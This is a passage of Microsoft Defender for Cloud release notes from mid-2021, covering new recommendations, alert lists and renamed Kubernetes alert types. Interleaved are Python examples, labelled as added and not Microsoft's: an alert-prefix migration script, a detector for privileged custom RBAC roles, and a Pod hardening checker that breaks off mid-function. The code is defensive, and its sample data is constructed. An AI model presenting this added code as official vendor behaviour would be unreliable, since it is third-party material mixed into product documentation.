• Existing users with Defender for Cloud's enhanced security features enabled and Microsoft Defender for Endpoint for Windows
• New users who have never enabled the integration with Microsoft Defender for Endpoint for Windows


Learn more in Protect your endpoints with Security Center's integrated EDR solution: Microsoft Defender for Endpoint.


Two new recommendations for managing endpoint protection 
solutions (in preview) 


We've added two preview recommendations to deploy and maintain the endpoint protection solutions 
on your machines. Both recommendations include support for Azure virtual machines and machines 
connected to Azure Arc-enabled servers. 


Recommendation: Endpoint protection should be installed on your machines
Description: To protect your machines from threats and vulnerabilities, install a supported endpoint protection solution. Learn more about how Endpoint Protection for machines is evaluated. (Related policy: Monitor missing Endpoint Protection in Azure Security Center)
Severity: High

Recommendation: Endpoint protection health issues should be resolved on your machines
Description: Resolve endpoint protection health issues on your virtual machines to protect them from the latest threats and vulnerabilities. Azure Security Center supported endpoint protection solutions are documented here. Endpoint protection assessment is documented here. (Related policy: Monitor missing Endpoint Protection in Azure Security Center)
Severity: Medium

Note
The recommendations show their freshness interval as 8 hours, but there are some scenarios in which this might take significantly longer. For example, when an on-premises machine is deleted, it takes 24 hours for Security Center to identify the deletion. After that, the assessment will take up to 8 hours to return the information. In that specific situation, therefore, it may take 32 hours for the machine to be removed from the list of affected resources.


[Screenshot: details page of the recommendation Endpoint protection should be installed on your machines, showing Severity High and Freshness interval 8 Hours.]


Built-in troubleshooting and guidance for solving common issues 


A new, dedicated area of the Security Center pages in the Azure portal provides a collated, ever-growing set of self-help materials for solving common challenges with Security Center and Azure Defender.


When you're facing an issue, or are seeking advice from our support team, Diagnose and solve problems is another tool to help you find the solution:


[Screenshot: Microsoft Defender for Cloud | Diagnose and solve problems. The Common problems area lists categories, each with a Troubleshoot link: Microsoft Defender Features (Adaptive Application Control, Just-in-time Access, File Integrity Monitoring, and more); Portal and UI; Recommendations operations and management (exemptions, Enforce or Deny, custom recommendations, compliance assignments); Security Alerts Investigation; Onboarding; Pricing, Billing and Usage; Recommendations remediation; Settings and configurations issues.]


Regulatory compliance dashboard's Azure Audit reports released 
for general availability (GA) 


The regulatory compliance dashboard's toolbar offers Azure and Dynamics certification reports for the standards applied to your subscriptions.


[Screenshot: the regulatory compliance dashboard toolbar with Download report, Manage compliance policies, Open query, Audit reports and Compliance over time workbook.]


You can select the tab for the relevant report types (PCI, SOC, ISO, and others) and use filters to find the specific reports you need.


For more information, see Generate compliance status reports and certificates. 


[Screenshot: the Audit reports tab listing Microsoft Azure, Dynamics 365 and Online Services ISO 27001, 27017, 27018 and 27701 assessment reports and certificates, filterable by region, industry and standard.]


Deprecated recommendation 'Log Analytics agent health issues 
should be resolved on your machines' 


We've found that recommendation Log Analytics agent health issues should be resolved on your 
machines impacts secure scores in ways that are inconsistent with Security Center's Cloud Security 
Posture Management (CSPM) focus. Typically, CSPM relates to identifying security misconfigurations. 
Agent health issues don't fit into this category of issues. 


Also, the recommendation is an anomaly when compared with the other agents related to Security 
Center: this is the only agent with a recommendation related to health issues. 


The recommendation has been deprecated. 


As a result of this deprecation, we've also made minor changes to the recommendations for installing 
the Log Analytics agent (Log Analytics agent should be installed on...). 


It's likely that this change will impact your secure scores. For most subscriptions, we expect the change to lead to an increased score, but it's possible the updates to the installation recommendation might result in decreased scores in some cases.


Tip


The asset inventory page was also affected by this change as it displays the monitored status for 
machines (monitored, not monitored, or partially monitored - a state which refers to an agent 
with health issues). 


Azure Defender for container registries now scans for 
vulnerabilities in registries protected with Azure Private Link 


Azure Defender for container registries includes a vulnerability scanner to scan images in your Azure 
Container Registry registries. Learn how to scan your registries and remediate findings in Use Azure 
Defender for container registries to scan your images for vulnerabilities. 


To limit access to a registry hosted in Azure Container Registry, assign virtual network private IP addresses to the registry endpoints and use Azure Private Link as explained in Connect privately to an Azure container registry using Azure Private Link.


As part of our ongoing efforts to support additional environments and use cases, Azure Defender now 
also scans container registries protected with Azure Private Link. 


Security Center can now auto provision the Azure Policy's Guest 
Configuration extension (in preview) 


Azure Policy can audit settings inside a machine, both for machines running in Azure and Arc 
connected machines. The validation is performed by the Guest Configuration extension and client. 
Learn more in Understand Azure Policy's Guest Configuration. 


With this update, you can now set Security Center to automatically provision this extension to all supported machines.


[Screenshot: Settings | Auto provisioning - Extensions, listing the Log Analytics agent for Azure VMs, Microsoft Dependency agent (preview), Policy Add-on for Kubernetes and Guest Configuration agent (preview), each with its status and the number of resources missing the extension. The Guest Configuration agent checks machines running in Azure and Arc connected machines for security misconfigurations: configuration of the operating system, application configurations, and environment settings are all validated.]


Learn more about how auto provisioning works in Configure auto provisioning for agents and extensions.


Recommendations to enable Azure Defender plans now support 
"Enforce" 


Security Center includes two features that help ensure newly created resources are provisioned in a secure manner: enforce and deny. When a recommendation offers these options, you can ensure your security requirements are met whenever someone attempts to create a resource:


• Deny stops unhealthy resources from being created
• Enforce automatically remediates non-compliant resources when they're created


With this update, the enforce option is now available on the recommendations to enable Azure 
Defender plans (such as Azure Defender for App Service should be enabled, Azure Defender for Key 
Vault should be enabled, Azure Defender for Storage should be enabled). 


Learn more about these options in Prevent misconfigurations with Enforce/Deny recommendations. 


CSV exports of recommendation data now limited to 20 MB 


We're instituting a limit of 20 MB when exporting Security Center recommendations data. 


[Screenshot: the Recommendations page with the Download CSV report button.]

If you need to export larger amounts of data, use the available filters before selecting, or select subsets of your subscriptions and download the data in batches.


Learn more about performing a CSV export of your security recommendations. 


Recommendations page now includes multiple views 


The recommendations page now has two tabs to provide alternate ways to view the recommendations relevant to your resources:


• Secure score recommendations - Use this tab to view the list of recommendations grouped by security control. Learn more about these controls in Security controls and their recommendations.
• All recommendations - Use this tab to view the list of recommendations as a flat list. This tab is also great for understanding which initiative (including regulatory compliance standards) generated the recommendation. Learn more about initiatives and their relationship to recommendations in What are security policies, initiatives, and recommendations?.


[Screenshot: the Recommendations page with the Secure score recommendations and All recommendations tabs.]


July 2021 


Updates in July include: 


• Azure Sentinel connector now includes optional bi-directional alert synchronization (in preview)
• Logical reorganization of Azure Defender for Resource Manager alerts
• Enhancements to recommendation to enable Azure Disk Encryption (ADE)
• Continuous export of secure score and regulatory compliance data released for general availability (GA)
• Workflow automations can be triggered by changes to regulatory compliance assessments (GA)
• Assessments API field 'FirstEvaluationDate' and 'StatusChangeDate' now available in workspace schemas and logic apps
• 'Compliance over time' workbook template added to Azure Monitor Workbooks gallery


Azure Sentinel connector now includes optional bi-directional alert 
synchronization (in preview) 


Security Center natively integrates with Azure Sentinel, Azure's cloud-native SIEM and SOAR solution. 


Azure Sentinel includes built-in connectors for Azure Security Center at the subscription and tenant 
levels. Learn more in Stream alerts to Azure Sentinel. 


When you connect Azure Defender to Azure Sentinel, the status of Azure Defender alerts that get ingested into Azure Sentinel is synchronized between the two services. So, for example, when an alert is closed in Azure Defender, that alert will display as closed in Azure Sentinel as well. Changing the status of an alert in Azure Defender won't affect the status of any Azure Sentinel incidents that contain the synchronized Azure Sentinel alert, only that of the synchronized alert itself.


Enabling this preview feature, bi-directional alert synchronization, will automatically sync the status of 
the original Azure Defender alerts with Azure Sentinel incidents that contain the copies of those Azure 
Defender alerts. So, for example, when an Azure Sentinel incident containing an Azure Defender alert is 
closed, Azure Defender will automatically close the corresponding original alert. 


Learn more in Connect Azure Defender alerts from Azure Security Center. 


Logical reorganization of Azure Defender for Resource Manager 
alerts 


The alerts listed below were provided as part of the Azure Defender for Resource Manager plan. 


As part of a logical reorganization of some of the Azure Defender plans, we've moved some alerts from 
Azure Defender for Resource Manager to Azure Defender for Servers. 


The alerts are organized according to two main principles: 


• Alerts that provide control-plane protection - across many Azure resource types - are part of Azure Defender for Resource Manager
• Alerts that protect specific workloads are in the Azure Defender plan that relates to the corresponding workload


These are the alerts that were part of Azure Defender for Resource Manager, and which, as a result of 
this change, are now part of Azure Defender for Servers: 


• ARM_AmBroadFilesExclusion
• ARM_AmDisablementAndCodeExecution
• ARM_AmDisablement
• ARM_AmFileExclusionAndCodeExecution
• ARM_AmTempFileExclusionAndCodeExecution
• ARM_AmTempFileExclusion
• ARM_AmRealtimeProtectionDisabled
• ARM_AmTempRealtimeProtectionDisablement
• ARM_AmRealtimeProtectionDisablementAndCodeExec
• ARM_AmMalwareCampaignRelatedExclusion
• ARM_AmTemporarilyDisablement
• ARM_UnusualAmFileExclusion
• ARM_CustomScriptExtensionSuspiciousCmd
• ARM_CustomScriptExtensionSuspiciousEntryPoint
• ARM_CustomScriptExtensionSuspiciousPayload
• ARM_CustomScriptExtensionSuspiciousFailure
• ARM_CustomScriptExtensionUnusualDeletion
• ARM_CustomScriptExtensionUnusualExecution
• ARM_VMAccessUnusualConfigReset
• ARM_VMAccessUnusualPasswordReset
• ARM_VMAccessUnusualSSHReset


Learn more about the Azure Defender for Resource Manager and Azure Defender for Servers plans. 


Enhancements to recommendation to enable Azure Disk 
Encryption (ADE) 


Following user feedback, we've renamed the recommendation Disk encryption should be applied on virtual machines.


The new recommendation uses the same assessment ID and is called Virtual machines should encrypt temp disks, caches, and data flows between Compute and Storage resources.


The description has also been updated to better explain the purpose of this hardening recommendation:


Recommendation: Virtual machines should encrypt temp disks, caches, and data flows between Compute and Storage resources
Description: By default, a virtual machine's OS and data disks are encrypted-at-rest using platform-managed keys; temp disks and data caches aren't encrypted, and data isn't encrypted when flowing between compute and storage resources. For more information, see the comparison of different disk encryption technologies in Azure. Use Azure Disk Encryption to encrypt all this data. Disregard this recommendation if: (1) you're using the encryption-at-host feature, or (2) server-side encryption on Managed Disks meets your security requirements. Learn more in Server-side encryption of Azure Disk Storage.
Severity: High


Continuous export of secure score and regulatory compliance data 
released for general availability (GA) 


Continuous export provides the mechanism for exporting your security alerts and recommendations 
for tracking with other monitoring tools in your environment. 


When you set up your continuous export, you configure what is exported, and where it will go. Learn more in the overview of continuous export.


We've enhanced and expanded this feature over time:


• In November 2020, we added the preview option to stream changes to your secure score. For full details, see Secure score is now available in continuous export (preview).
• In December 2020, we added the preview option to stream changes to your regulatory compliance assessment data. For full details, see Continuous export gets new data types (preview).


With this update, these two options are released for general availability (GA). 


Workflow automations can be triggered by changes to regulatory 
compliance assessments (GA) 


In February 2021, we added a preview third data type to the trigger options for your workflow automations: changes to regulatory compliance assessments. Learn more in Workflow automations can be triggered by changes to regulatory compliance assessments.


With this update, this trigger option is released for general availability (GA).


Learn how to use the workflow automation tools in Automate responses to Security Center triggers. 


[Screenshot: Settings | Workflow automation, Add workflow automation. Trigger conditions: Defender for Cloud data type = Regulatory compliance standards; Compliance standard = Azure-Security-Benchmark; Compliance control state options: Failed, Passed, Skipped, Unsupported.]


Assessments API field 'FirstEvaluationDate' and 'StatusChangeDate' 
now available in workspace schemas and logic apps 


In May 2021, we updated the Assessment API with two new fields, FirstEvaluationDate and StatusChangeDate. For full details, see Assessments API expanded with two new fields.


Those fields were accessible through the REST API, Azure Resource Graph, continuous export, and in 
CSV exports. 


With this change, we're making the information available in the Log Analytics workspace schema and 
from logic apps. 


‘Compliance over time’ workbook template added to Azure 
Monitor Workbooks gallery 


In March, we announced the integrated Azure Monitor Workbooks experience in Security Center (see 
Azure Monitor Workbooks integrated into Security Center and three templates provided). 


The initial release included three templates to build dynamic and visual reports about your organization's security posture.


We've now added a workbook dedicated to tracking a subscription's compliance with the regulatory or industry standards applied to it.


Learn about using these reports or building your own in Create rich, interactive reports of Security 
Center data. 


[Screenshot: Microsoft Defender for Cloud | Workbooks | Compliance Over Time, with a Regulatory compliance overview of passed controls per standard (SOC-TSP, ISO-27001, PCI-DSS-3.2.1, Azure-Security-Benchmark, AWS-CIS-1.2.0, AWS-PCI-DSS-3.2.1, AWS-Foundational-Security-Best-Practices, GCP-CIS-1.1.0), a weekly chart of passed controls over time, and a Changes for 'Azure-Security-Benchmark' table of passed controls and 30-day change per main control.]
June 2021


Updates in June include: 


• New alert for Azure Defender for Key Vault
• Recommendations to encrypt with customer-managed keys (CMKs) disabled by default
• Prefix for Kubernetes alerts changed from "AKS_" to "K8S_"
• Deprecated two recommendations from "Apply system updates" security control


New alert for Azure Defender for Key Vault 


To expand the threat protections provided by Azure Defender for Key Vault, we've added the following alert:

Alert (alert type) | Description | MITRE tactic | Severity
Access from a suspicious IP address to a key vault (KV_SuspiciousIPAccess) | A key vault has been successfully accessed by an IP that has been identified by Microsoft Threat Intelligence as a suspicious IP address. This may indicate that your infrastructure has been compromised. We recommend further investigation. Learn more about Microsoft's threat intelligence capabilities. | Credential Access | Medium


For more information, see: 


• Introduction to Azure Defender for Key Vault
• Respond to Azure Defender for Key Vault alerts
• List of alerts provided by Azure Defender for Key Vault


Recommendations to encrypt with customer-managed keys (CMKs) 
disabled by default 


Security Center includes multiple recommendations to encrypt data at rest with customer-managed keys, such as:

• Container registries should be encrypted with a customer-managed key (CMK)
• Azure Cosmos DB accounts should use customer-managed keys to encrypt data at rest
• Azure Machine Learning workspaces should be encrypted with a customer-managed key (CMK)


Data in Azure is encrypted automatically using platform-managed keys, so the use of customer-managed keys should only be applied when required for compliance with a specific policy your organization is choosing to enforce.

With this change, the recommendations to use CMKs are now disabled by default. When relevant for your organization, you can enable them by changing the Effect parameter for the corresponding security policy to AuditIfNotExists or Enforce. Learn more in Enable a security recommendation.

This change is reflected in the names of the recommendations with a new prefix, [Enable if required], as shown in the following examples:

• [Enable if required] Storage accounts should use customer-managed key to encrypt data at rest
• [Enable if required] Container registries should be encrypted with a customer-managed key (CMK)
• [Enable if required] Azure Cosmos DB accounts should use customer-managed keys to encrypt data at rest


[Screenshot: the recommendations list filtered on "cmk", showing "[Enable if required] Storage accounts should use customer-managed key (CMK) for encryption" and "[Enable if required] Container registries should be encrypted with a customer-managed key (CMK)" alongside "Azure Machine Learning workspaces should be encrypted with a customer-managed key (CMK)", each with its unhealthy resource count and initiative (ASB, Azure CIS 1.3.0).]


Prefix for Kubernetes alerts changed from "AKS_" to "K8S_" 


Azure Defender for Kubernetes recently expanded to protect Kubernetes clusters hosted on-premises 
and in multicloud environments. Learn more in Use Azure Defender for Kubernetes to protect hybrid 
and multicloud Kubernetes deployments (in preview). 


To reflect the fact that the security alerts provided by Azure Defender for Kubernetes are no longer 
restricted to clusters on Azure Kubernetes Service, we've changed the prefix for the alert types from 
"AKS_" to "K8S_". Where necessary, the names and descriptions were updated too. For example, this 
alert: 


Alert (alert type) | Description
Kubernetes penetration testing tool detected (AKS_PenTestToolsKubeHunter) | Kubernetes audit log analysis detected usage of Kubernetes penetration testing tool in the AKS cluster. While this behavior can be legitimate, attackers might use such public tools for malicious purposes.


was changed to: 


Alert (alert type) | Description
Kubernetes penetration testing tool detected (K8S_PenTestToolsKubeHunter) | Kubernetes audit log analysis detected usage of Kubernetes penetration testing tool in the Kubernetes cluster. While this behavior can be legitimate, attackers might use such public tools for malicious purposes.


Any suppression rules that refer to alerts beginning with "AKS_" were automatically converted. If you've set up SIEM exports, or custom automation scripts that refer to Kubernetes alerts by alert type, you'll need to update them with the new alert types.


For a full list of the Kubernetes alerts, see Alerts for Kubernetes clusters. 
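The migration step described above (updating SIEM exports and automation that reference Kubernetes alerts by alert type) as an added Python example; this is not Microsoft code. The configuration it rewrites is a constructed, hypothetical JSON-like document, and the only real alert type in it is AKS_PenTestToolsKubeHunter from this release note. Strings that carry the bare prefix without a full alert name (for instance a prefix-only filter) are reported for manual review rather than rewritten blindly.

```python
"""Migrate Kubernetes alert-type references from the "AKS_" prefix to "K8S_".

Added example, not Microsoft code. It rewrites a hypothetical, constructed
automation/SIEM configuration held as JSON-like data; only the alert type
AKS_PenTestToolsKubeHunter is taken from the release note itself.
"""
from __future__ import annotations

import json
import re

OLD_PREFIX = "AKS_"
NEW_PREFIX = "K8S_"

# A complete alert-type token with the old prefix, e.g. AKS_PenTestToolsKubeHunter.
_ALERT_TYPE_RE = re.compile(r"\bAKS_(?P<name>[A-Za-z0-9]+)\b")


def migrate_alert_type(alert_type: str) -> str:
    """Return the alert type under the new prefix; non-Kubernetes types are unchanged."""
    if alert_type.startswith(OLD_PREFIX):
        return NEW_PREFIX + alert_type[len(OLD_PREFIX):]
    return alert_type


def matches_alert_type(incoming: str, expected: str) -> bool:
    """Compare an incoming alert type with a rule's type, tolerating either prefix.

    Useful while historical exports (AKS_*) and new alerts (K8S_*) overlap.
    """
    return migrate_alert_type(incoming) == migrate_alert_type(expected)


def migrate_config(config) -> tuple[object, list[str], list[str]]:
    """Rewrite every complete AKS_<Name> reference inside nested dicts/lists/strings.

    Returns (rewritten config, list of "old -> new" changes, list of strings that
    still contain the bare old prefix and therefore need manual review, such as
    a prefix-only filter like startswith "AKS_").
    """
    changed: list[str] = []
    manual: list[str] = []

    def walk(node):
        if isinstance(node, dict):
            return {k: walk(v) for k, v in node.items()}
        if isinstance(node, list):
            return [walk(v) for v in node]
        if isinstance(node, str):
            new = _ALERT_TYPE_RE.sub(lambda m: NEW_PREFIX + m.group("name"), node)
            if new != node:
                changed.append(f"{node} -> {new}")
            if OLD_PREFIX in new:
                manual.append(new)
            return new
        return node

    return walk(config), changed, manual


# Constructed sample: a hypothetical suppression/routing config, not a real product format.
SAMPLE_CONFIG = {
    "suppressions": [
        {"alertType": "AKS_PenTestToolsKubeHunter", "reason": "approved assessment window"},
        {"alertType": "KV_SuspiciousIPAccess", "reason": "tuned, see ticket"},
    ],
    "routing": {
        "kql": 'SecurityAlert | where AlertType startswith "AKS_"',
        "notify": ["soc@example.invalid"],
    },
}

if __name__ == "__main__":
    migrated, changes, needs_review = migrate_config(SAMPLE_CONFIG)
    print(json.dumps(migrated, indent=2))
    print("changed:", changes)
    print("manual review:", needs_review)
```

The review list matters: a rule written as `startswith "AKS_"` silently stops matching anything once new alerts arrive under `K8S_`, so such filters should be rewritten by hand, and `matches_alert_type` lets a consumer accept both spellings while old exports and new alerts overlap.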


Deprecated two recommendations from "Apply system updates" 
security control 


The following two recommendations were deprecated: 


• OS version should be updated for your cloud service roles - By default, Azure periodically updates your guest OS to the latest supported image within the OS family that you've specified in your service configuration (.cscfg), such as Windows Server 2016.
• Kubernetes Services should be upgraded to a non-vulnerable Kubernetes version - This recommendation's evaluations aren't as wide-ranging as we'd like them to be. We plan to replace the recommendation with an enhanced version that's better aligned with your security needs.


May 2021 


Updates in May include: 


• Azure Defender for DNS and Azure Defender for Resource Manager released for general availability (GA)
• Azure Defender for open-source relational databases released for general availability (GA)
• New alerts for Azure Defender for Resource Manager
• CI/CD vulnerability scanning of container images with GitHub workflows and Azure Defender (preview)
• More Resource Graph queries available for some recommendations
• SQL data classification recommendation severity changed
• New recommendations to enable trusted launch capabilities (in preview)
• New recommendations for hardening Kubernetes clusters (in preview)
• Assessments API expanded with two new fields
• Asset inventory gets a cloud environment filter


Azure Defender for DNS and Azure Defender for Resource 
Manager released for general availability (GA) 


These two cloud-native breadth threat protection plans are now GA. 


These new protections greatly enhance your resiliency against attacks from threat actors, and 
significantly increase the number of Azure resources protected by Azure Defender. 


• Azure Defender for Resource Manager - automatically monitors all resource management operations performed in your organization. For more information, see:
  o Introduction to Azure Defender for Resource Manager
  o Respond to Azure Defender for Resource Manager alerts
  o List of alerts provided by Azure Defender for Resource Manager
• Azure Defender for DNS - continuously monitors all DNS queries from your Azure resources. For more information, see:
  o Introduction to Azure Defender for DNS
  o Respond to Azure Defender for DNS alerts
  o List of alerts provided by Azure Defender for DNS

To simplify the process of enabling these plans, use the recommendations:

• Azure Defender for Resource Manager should be enabled
• Azure Defender for DNS should be enabled


Note

Enabling Azure Defender plans results in charges. Learn about the pricing details per region on Security Center's pricing page.


Azure Defender for open-source relational databases released for 
general availability (GA) 


Azure Security Center expands its offer for SQL protection with a new bundle to cover your open-source relational databases:

• Azure Defender for Azure SQL database servers - defends your Azure-native SQL Servers
• Azure Defender for SQL servers on machines - extends the same protections to your SQL servers in hybrid, multicloud, and on-premises environments
• Azure Defender for open-source relational databases - defends your Azure Databases for MySQL, PostgreSQL, and MariaDB single servers


Azure Defender for open-source relational databases constantly monitors your servers for security 
threats and detects anomalous database activities indicating potential threats to Azure Database for 
MySQL, PostgreSQL, and MariaDB. Some examples are: 


• Granular detection of brute force attacks - Azure Defender for open-source relational databases provides detailed information on attempted and successful brute force attacks. This lets you investigate and respond with a more complete understanding of the nature and status of the attack on your environment.
• Behavioral alerts detection - Azure Defender for open-source relational databases alerts you to suspicious and unexpected behaviors on your servers, such as changes in the access pattern to your database.
• Threat intelligence-based detection - Azure Defender applies Microsoft's threat intelligence and vast knowledge base to surface threat alerts so you can act against them.


Learn more in Introduction to Azure Defender for open-source relational databases. 


New alerts for Azure Defender for Resource Manager 


To expand the threat protections provided by Azure Defender for Resource Manager, we've added the 
following alerts: 


Alert (alert type) | Description | MITRE tactics | Severity
Permissions granted for an RBAC role in an unusual way for your Azure environment (Preview) (ARM_AnomalousRBACRoleAssignment) | Azure Defender for Resource Manager detected an RBAC role assignment that's unusual when compared with other assignments performed by the same assigner / performed for the same assignee / in your tenant due to the following anomalies: assignment time, assigner location, assigner, authentication method, assigned entities, client software used, assignment extent. This operation might have been performed by a legitimate user in your organization. Alternatively, it might indicate that an account in your organization was breached, and that the threat actor is trying to grant permissions to an additional user account they own. | Lateral Movement, Defense Evasion | Medium
Privileged custom role created for your subscription in a suspicious way (Preview) (ARM_PrivilegedRoleDefinitionCreation) | Azure Defender for Resource Manager detected a suspicious creation of privileged custom role definition in your subscription. This operation might have been performed by a legitimate user in your organization. Alternatively, it might indicate that an account in your organization was breached, and that the threat actor is trying to create a privileged role to use in the future to evade detection. | Lateral Movement, Defense Evasion | Low
Azure Resource Manager operation from suspicious IP address (Preview) (ARM_OperationFromSuspiciousIP) | Azure Defender for Resource Manager detected an operation from an IP address that has been marked as suspicious in threat intelligence feeds. | Execution | Medium
Azure Resource Manager operation from suspicious proxy IP address (Preview) (ARM_OperationFromSuspiciousProxyIP) | Azure Defender for Resource Manager detected a resource management operation from an IP address that is associated with proxy services, such as TOR. While this behavior can be legitimate, it's often seen in malicious activities, when threat actors try to hide their source IP. | Defense Evasion | Medium


For more information, see: 


• Introduction to Azure Defender for Resource Manager
• Respond to Azure Defender for Resource Manager alerts
• List of alerts provided by Azure Defender for Resource Manager
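The ARM_PrivilegedRoleDefinitionCreation alert above is raised on a privileged custom role definition being created. As an added illustration of the raw control-plane signal behind that alert (not Defender for Resource Manager's own logic, which also weighs anomalies), the following Python scans Activity Log style records for roleDefinitions/write operations whose permissions grant RBAC-controlling actions. The record shape is a simplified, constructed approximation of an Azure Activity Log entry, and the caller names and IP addresses are made up for the example.

```python
"""Flag privileged custom role definitions in Activity Log style records.

Added example for illustration only; it is not Defender for Resource Manager's
detection logic. The record shape is a constructed, simplified approximation
of an Azure Activity Log entry for a roleDefinitions/write operation.
"""
from __future__ import annotations

import fnmatch
import json

ROLE_DEF_WRITE = "Microsoft.Authorization/roleDefinitions/write"

# Actions that give a principal control over access itself. A custom role that
# grants any of them, directly or through a wildcard, is treated as privileged.
PRIVILEGED_ACTIONS = (
    "Microsoft.Authorization/*/write",
    "Microsoft.Authorization/roleAssignments/write",
    "Microsoft.Authorization/roleDefinitions/write",
    "Microsoft.Authorization/elevateAccess/action",
)


def _grants(action_pattern: str, privileged: str) -> bool:
    """True if an RBAC action pattern (which may contain * wildcards) covers a privileged action."""
    return fnmatch.fnmatchcase(privileged.lower(), action_pattern.lower())


def privileged_actions_in(role_definition: dict) -> list[str]:
    """Return the privileged actions effectively granted by a role definition.

    NotActions are honoured: an action excluded there is not counted as granted.
    """
    found: list[str] = []
    for perm in role_definition.get("properties", {}).get("permissions", []):
        actions = perm.get("actions", [])
        not_actions = perm.get("notActions", [])
        for priv in PRIVILEGED_ACTIONS:
            granted = any(_grants(a, priv) for a in actions)
            excluded = any(_grants(n, priv) for n in not_actions)
            if granted and not excluded and priv not in found:
                found.append(priv)
    return found


def scan_activity_log(records: list[dict]) -> list[dict]:
    """Return one finding per roleDefinitions/write that creates a privileged custom role."""
    findings = []
    for rec in records:
        if rec.get("operationName") != ROLE_DEF_WRITE:
            continue
        body = rec.get("properties", {}).get("requestbody")
        if not body:
            continue
        role_def = json.loads(body) if isinstance(body, str) else body
        privileged = privileged_actions_in(role_def)
        if privileged:
            findings.append({
                "caller": rec.get("caller"),
                "callerIp": rec.get("httpRequest", {}).get("clientIpAddress"),
                "roleName": role_def.get("properties", {}).get("roleName"),
                "privilegedActions": privileged,
            })
    return findings


def _record(caller: str, ip: str, role_name: str, actions: list, not_actions: list) -> dict:
    """Build one constructed Activity Log style record (helper for the sample below)."""
    return {
        "operationName": ROLE_DEF_WRITE,
        "caller": caller,
        "httpRequest": {"clientIpAddress": ip},
        "properties": {"requestbody": json.dumps({"properties": {
            "roleName": role_name,
            "permissions": [{"actions": actions, "notActions": not_actions}]}})},
    }


# Constructed sample records (documentation IP ranges, fictitious callers).
SAMPLE_RECORDS = [
    # Benign: a read-only custom role.
    _record("ops-admin@example.invalid", "203.0.113.10", "VM Reader Custom",
            ["Microsoft.Compute/virtualMachines/read"], []),
    # Privileged: a wildcard that silently includes RBAC writes.
    _record("contractor@example.invalid", "198.51.100.7", "Temp Helper", ["*"], []),
    # Wildcard with the RBAC namespace explicitly excluded: not flagged.
    _record("platform@example.invalid", "203.0.113.11", "Builder", ["*"], ["Microsoft.Authorization/*"]),
    # Unrelated operation, ignored by the scan.
    {"operationName": "Microsoft.Compute/virtualMachines/start/action", "caller": "ops-admin@example.invalid"},
]

if __name__ == "__main__":
    for finding in scan_activity_log(SAMPLE_RECORDS):
        print(json.dumps(finding))
```

The wildcard handling is the point: a role whose actions are just `*` looks harmless in a quick review but grants roleAssignments/write, so the check expands patterns against the privileged list instead of string-matching action names, and it honours NotActions so a deliberately scoped wildcard role is not a false positive.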


CI/CD vulnerability scanning of container images with GitHub 
workflows and Azure Defender (preview) 


Azure Defender for container registries now provides DevSecOps teams observability into GitHub 
Actions workflows. 


The new vulnerability scanning feature for container images, utilizing Trivy, helps your developers scan 
for common vulnerabilities in their container images before pushing images to container registries. 


Container scan reports are summarized in Azure Security Center, providing security teams better 
insight and understanding about the source of vulnerable container images and the workflows and 
repositories from where they originate. 


Learn more in Identify vulnerable container images in your CI/CD workflows. 


More Resource Graph queries available for some recommendations 


All of Security Center's recommendations have the option to view the information about the status of affected resources using Azure Resource Graph from the Open query button. For full details about this powerful feature, see Review recommendation data in Azure Resource Graph Explorer (ARG).

Security Center includes built-in vulnerability scanners to scan your VMs, SQL servers and their hosts, and container registries for security vulnerabilities. The findings are returned as recommendations with all the individual findings for each resource type gathered into a single view. The recommendations are:

• Vulnerabilities in Azure Container Registry images should be remediated (powered by Qualys)
• Vulnerabilities in your virtual machines should be remediated
• SQL databases should have vulnerability findings resolved
• SQL servers on machines should have vulnerability findings resolved


With this change, you can use the Open query button to also open the query showing the security 
findings. 


[Screenshot: the "Vulnerabilities in Azure Container Registry images should be remediated (powered by Qualys)" recommendation page. The Open query menu offers "Query returning affected resources" and "Query returning security findings"; the page shows summary tiles (unhealthy registries, vulnerabilities by severity, registries with most vulnerabilities), the Description, Remediation steps and Affected resources sections, and the Security Checks findings table with the columns ID, Security Check, Category, Applies To, Severity and Patch Available.]


The Open query button offers additional options for some other recommendations where relevant. Learn more about Security Center's vulnerability scanners:

• Azure Defender's integrated Qualys vulnerability scanner for Azure and hybrid machines
• Azure Defender's integrated vulnerability assessment scanner for SQL servers
• Azure Defender's integrated vulnerability assessment scanner for container registries


SQL data classification recommendation severity changed 


The severity of the recommendation Sensitive data in your SQL databases should be classified has been changed from High to Low.

This is part of an ongoing change to this recommendation announced in our upcoming changes page.


New recommendations to enable trusted launch capabilities (in 
preview) 


Azure offers trusted launch as a seamless way to improve the security of generation 2 VMs. Trusted launch protects against advanced and persistent attack techniques. Trusted launch is composed of several, coordinated infrastructure technologies that can be enabled independently. Each technology provides another layer of defense against sophisticated threats. Learn more in Trusted launch for Azure virtual machines.


Important

Trusted launch requires the creation of new virtual machines. You can't enable trusted launch on existing virtual machines that were initially created without it.

Trusted launch is currently in public preview. The preview is provided without a service level agreement, and it's not recommended for production workloads. Certain features might not be supported or might have constrained capabilities.


Security Center's recommendation, vTPM should be enabled on supported virtual machines, ensures your Azure VMs are using a vTPM. This virtualized version of a hardware Trusted Platform Module enables attestation by measuring the entire boot chain of your VM (UEFI, OS, system, and drivers).

With the vTPM enabled, the Guest Attestation extension can remotely validate the secure boot. The following recommendations ensure this extension is deployed:

• Secure Boot should be enabled on supported Windows virtual machines
• Guest Attestation extension should be installed on supported Windows virtual machines
• Guest Attestation extension should be installed on supported Windows Virtual Machine Scale Sets
• Guest Attestation extension should be installed on supported Linux virtual machines
• Guest Attestation extension should be installed on supported Linux Virtual Machine Scale Sets


Learn more in Trusted launch for Azure virtual machines. 


New recommendations for hardening Kubernetes clusters (in 
preview) 


The following recommendations allow you to further harden your Kubernetes clusters:

• Kubernetes clusters should not use the default namespace - To protect against unauthorized access for ConfigMap, Pod, Secret, Service, and ServiceAccount resource types, prevent usage of the default namespace in Kubernetes clusters.
• Kubernetes clusters should disable automounting API credentials - To prevent a potentially compromised Pod resource from running API commands against Kubernetes clusters, disable automounting API credentials.
• Kubernetes clusters should not grant CAP_SYS_ADMIN security capabilities


Learn how Security Center can protect your containerized environments in Container security in Security Center.
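The three hardening recommendations above map to concrete fields in a Pod manifest. As an added example (not Security Center's own policy logic), the following Python checks a manifest for all three and shows a weak Pod beside its hardened form. Manifests are plain dicts so that no YAML library is needed; both sample Pods and the image name are constructed for the example.

```python
"""Check Pod manifests against the three Kubernetes hardening recommendations.

Added example, not Security Center's own policy logic. Manifests are plain
dicts (the same structure a YAML parser would produce) so this runs offline.
"""
from __future__ import annotations


def check_pod(manifest: dict) -> list[str]:
    """Return the hardening findings for a Pod manifest (empty list if clean)."""
    findings: list[str] = []
    meta = manifest.get("metadata", {})
    spec = manifest.get("spec", {})
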